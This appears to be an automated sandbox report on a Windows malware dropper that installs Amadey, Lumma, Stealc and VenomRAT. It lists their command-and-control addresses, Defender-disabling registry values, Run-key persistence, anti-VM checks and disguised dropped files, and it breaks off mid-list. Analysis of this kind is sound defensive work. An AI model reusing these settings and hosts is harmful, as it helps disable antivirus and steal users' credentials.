Analysis
-
max time kernel
143s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
10-12-2024 14:34
Static task
static1
Behavioral task
behavioral1
Sample
c457d98d61906051ab1744e9e680334f69fd7ce6888cb7836a46bc82c8f2fa96.exe
Resource
win10v2004-20241007-en
General
-
Target
c457d98d61906051ab1744e9e680334f69fd7ce6888cb7836a46bc82c8f2fa96.exe
-
Size
7.0MB
-
MD5
a9910f03968585550a8e5e1c5913acb6
-
SHA1
1f04963fb8947a56ea31c04c5b0869770fde836b
-
SHA256
c457d98d61906051ab1744e9e680334f69fd7ce6888cb7836a46bc82c8f2fa96
-
SHA512
42dd69df6dfed2d3d3a9d57bd4034f0e3f9248f2a261670bda61f96547c8c7c0cb4f71b2a4ac68360b0cdf46cd4976a863899c91ab47620160d78f05112f29b0
-
SSDEEP
196608:kedgAK+4K5xQiVP6sht1JFHRKPsms8cc50IzAAkhD:kYgA7XVP6i13HRiTGc50M4
Malware Config
Extracted
amadey
4.42
9c9aa5
http://185.215.113.43
-
install_dir
abc3bc1985
-
install_file
skotes.exe
-
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
-
url_paths
/Zu7JuNko/index.php
Extracted
lumma
https://impend-differ.biz/api
https://print-vexer.biz/api
https://dare-curbys.biz/api
https://covery-mover.biz/api
https://formy-spill.biz/api
https://dwell-exclaim.biz/api
https://zinc-sneark.biz/api
https://se-blurry.biz/api
https://atten-supporse.biz/api
Extracted
stealc
stok
http://185.215.113.206
-
url_path
/c4becf79229cb002.php
Extracted
asyncrat
Venom RAT + HVNC + Stealer + Grabber v6.0.3
Default
205.209.109.10:4449
205.209.109.10:7723
clgbfqzkkypxjps
-
delay
1
-
install
false
-
install_folder
%AppData%
Extracted
lumma
https://atten-supporse.biz/api
https://covery-mover.biz/api
Signatures
-
Amadey family
-
Asyncrat family
-
Gcleaner family
-
Lumma family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" ed4c813528.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" ed4c813528.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" 4R840N.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" 4R840N.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" 4R840N.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" 4R840N.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" 4R840N.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" ed4c813528.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" ed4c813528.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" ed4c813528.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection 4R840N.exe -
Stealc family
-
StormKitty
StormKitty is an open source info stealer written in C#.
-
StormKitty payload 1 IoCs
resource yara_rule behavioral1/memory/3644-134-0x0000000009EB0000-0x0000000009FD2000-memory.dmp family_stormkitty -
Stormkitty family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 3416 created 2360 3416 powershell.exe 102 -
resource yara_rule behavioral1/memory/3644-94-0x0000000000B10000-0x0000000000F72000-memory.dmp VenomRAT behavioral1/memory/3644-93-0x0000000000B10000-0x0000000000F72000-memory.dmp VenomRAT behavioral1/memory/3644-215-0x0000000000B10000-0x0000000000F72000-memory.dmp VenomRAT -
Venomrat family
-
Async RAT payload 3 IoCs
resource yara_rule behavioral1/memory/3644-94-0x0000000000B10000-0x0000000000F72000-memory.dmp family_asyncrat behavioral1/memory/3644-93-0x0000000000B10000-0x0000000000F72000-memory.dmp family_asyncrat behavioral1/memory/3644-215-0x0000000000B10000-0x0000000000F72000-memory.dmp family_asyncrat -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 12 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 2l0932.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 3C22x.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 4R840N.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 3cf7ddfd1d.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 35042eaba5.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ ed4c813528.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 1E05b7.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ H3tyh96.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 282c8bec95.exe -
Disables Task Manager via registry modification
-
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 24 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3C22x.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion H3tyh96.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 282c8bec95.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ed4c813528.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2l0932.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 4R840N.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3cf7ddfd1d.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 282c8bec95.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1E05b7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1E05b7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2l0932.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 4R840N.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3cf7ddfd1d.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ed4c813528.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3C22x.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion H3tyh96.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 35042eaba5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 35042eaba5.exe -
Checks computer location settings 2 TTPs 6 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation 1E05b7.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation skotes.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation UkYEOVR.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation H3tyh96.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation HyperServerFontdll.exe -
Executes dropped EXE 19 IoCs
pid Process 3420 p4Y09.exe 5108 L9O32.exe 4752 1E05b7.exe 2988 skotes.exe 4756 2l0932.exe 2732 3C22x.exe 2864 Z9Pp9pM.exe 1756 4R840N.exe 3644 H3tyh96.exe 2488 UkYEOVR.exe 1208 3cf7ddfd1d.exe 1576 282c8bec95.exe 1840 HyperServerFontdll.exe 4704 35042eaba5.exe 2920 23dd480935.exe 2932 dwm.exe 1480 ed4c813528.exe 6672 skotes.exe 5448 skotes.exe -
Identifies Wine through registry keys 2 TTPs 12 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Wine 2l0932.exe Key opened \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Wine 3C22x.exe Key opened \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Wine 4R840N.exe Key opened \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Wine 35042eaba5.exe Key opened \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Wine ed4c813528.exe Key opened \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Wine 1E05b7.exe Key opened \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Wine H3tyh96.exe Key opened \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Wine 3cf7ddfd1d.exe Key opened \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Wine 282c8bec95.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features 4R840N.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 4R840N.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" ed4c813528.exe -
Adds Run key to start application 2 TTPs 7 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\282c8bec95.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1013731001\\282c8bec95.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\35042eaba5.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1013732001\\35042eaba5.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\23dd480935.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1013733001\\23dd480935.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ed4c813528.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1013734001\\ed4c813528.exe" skotes.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" c457d98d61906051ab1744e9e680334f69fd7ce6888cb7836a46bc82c8f2fa96.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" p4Y09.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" L9O32.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
pid Process 1044 powershell.exe -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x0007000000023cae-342.dat autoit_exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 12 IoCs
pid Process 4752 1E05b7.exe 2988 skotes.exe 4756 2l0932.exe 2732 3C22x.exe 1756 4R840N.exe 3644 H3tyh96.exe 1208 3cf7ddfd1d.exe 1576 282c8bec95.exe 4704 35042eaba5.exe 1480 ed4c813528.exe 6672 skotes.exe 5448 skotes.exe -
Drops file in Program Files directory 4 IoCs
description ioc Process File created C:\Program Files (x86)\Windows Mail\OfficeClickToRun.exe HyperServerFontdll.exe File created C:\Program Files (x86)\Windows Mail\e6c9b481da804f HyperServerFontdll.exe File created C:\Program Files\Microsoft Office 15\ClientX64\dwm.exe HyperServerFontdll.exe File created C:\Program Files\Microsoft Office 15\ClientX64\6cb0b6c459d5d3 HyperServerFontdll.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\SchCache\csrss.exe HyperServerFontdll.exe File created C:\Windows\SchCache\886983d96e3d3e HyperServerFontdll.exe File created C:\Windows\Tasks\skotes.job 1E05b7.exe File created C:\Windows\diagnostics\scheduled\Maintenance\it-IT\sysmon.exe HyperServerFontdll.exe -
Launches sc.exe 3 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2912 sc.exe 4404 sc.exe 4664 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 2 IoCs
pid pid_target Process procid_target 4372 3644 WerFault.exe 93 6360 1208 WerFault.exe 106 -
System Location Discovery: System Language Discovery 1 TTPs 37 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language L9O32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2l0932.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 23dd480935.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language skotes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3cf7ddfd1d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 282c8bec95.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language whoami.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3C22x.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Z9Pp9pM.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1E05b7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4R840N.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 35042eaba5.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language 23dd480935.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language H3tyh96.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language whoami.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage 23dd480935.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language p4Y09.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ed4c813528.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language c457d98d61906051ab1744e9e680334f69fd7ce6888cb7836a46bc82c8f2fa96.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language UkYEOVR.exe -
Checks processor information in registry 2 TTPs 8 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe -
Kills process with taskkill 5 IoCs
pid Process 3644 taskkill.exe 4440 taskkill.exe 2068 taskkill.exe 2540 taskkill.exe 3732 taskkill.exe -
Modifies data under HKEY_USERS 46 IoCs
description ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe -
Modifies registry class 3 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings UkYEOVR.exe Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings HyperServerFontdll.exe Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings firefox.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 3420 reg.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4752 1E05b7.exe 4752 1E05b7.exe 2988 skotes.exe 2988 skotes.exe 4756 2l0932.exe 4756 2l0932.exe 2732 3C22x.exe 2732 3C22x.exe 1756 4R840N.exe 1756 4R840N.exe 1756 4R840N.exe 1756 4R840N.exe 3644 H3tyh96.exe 3644 H3tyh96.exe 3644 H3tyh96.exe 3644 H3tyh96.exe 3644 H3tyh96.exe 3416 powershell.exe 1208 3cf7ddfd1d.exe 1208 3cf7ddfd1d.exe 3416 powershell.exe 1576 282c8bec95.exe 1576 282c8bec95.exe 3416 powershell.exe 3416 powershell.exe 1044 powershell.exe 1044 powershell.exe 1044 powershell.exe 4704 35042eaba5.exe 4704 35042eaba5.exe 1840 HyperServerFontdll.exe 1840 HyperServerFontdll.exe 1840 HyperServerFontdll.exe 1840 HyperServerFontdll.exe 1840 HyperServerFontdll.exe 1840 HyperServerFontdll.exe 1840 HyperServerFontdll.exe 1840 HyperServerFontdll.exe 1840 HyperServerFontdll.exe 1840 HyperServerFontdll.exe 1840 HyperServerFontdll.exe 1840 HyperServerFontdll.exe 1840 HyperServerFontdll.exe 1840 HyperServerFontdll.exe 1840 HyperServerFontdll.exe 1840 HyperServerFontdll.exe 1840 HyperServerFontdll.exe 1840 HyperServerFontdll.exe 1840 HyperServerFontdll.exe 1840 HyperServerFontdll.exe 1840 HyperServerFontdll.exe 1840 HyperServerFontdll.exe 1840 HyperServerFontdll.exe 1840 HyperServerFontdll.exe 1840 HyperServerFontdll.exe 1840 HyperServerFontdll.exe 1840 HyperServerFontdll.exe 1840 HyperServerFontdll.exe 1840 HyperServerFontdll.exe 1840 HyperServerFontdll.exe 1840 HyperServerFontdll.exe 1840 HyperServerFontdll.exe 1840 HyperServerFontdll.exe 1840 HyperServerFontdll.exe -
Suspicious use of AdjustPrivilegeToken 60 IoCs
description pid Process Token: SeDebugPrivilege 1756 4R840N.exe Token: SeDebugPrivilege 3644 H3tyh96.exe Token: SeDebugPrivilege 3416 powershell.exe Token: SeDebugPrivilege 4460 whoami.exe Token: SeDebugPrivilege 4460 whoami.exe Token: SeDebugPrivilege 4460 whoami.exe Token: SeDebugPrivilege 4460 whoami.exe Token: SeDebugPrivilege 4460 whoami.exe Token: SeDebugPrivilege 4460 whoami.exe Token: SeDebugPrivilege 4460 whoami.exe Token: SeDebugPrivilege 4460 whoami.exe Token: SeDebugPrivilege 4460 whoami.exe Token: SeDebugPrivilege 4460 whoami.exe Token: SeDebugPrivilege 4460 whoami.exe Token: SeDebugPrivilege 4460 whoami.exe Token: SeDebugPrivilege 4460 whoami.exe Token: SeDebugPrivilege 4460 whoami.exe Token: SeDebugPrivilege 4460 whoami.exe Token: SeDebugPrivilege 4460 whoami.exe Token: SeDebugPrivilege 4460 whoami.exe Token: SeDebugPrivilege 4460 whoami.exe Token: 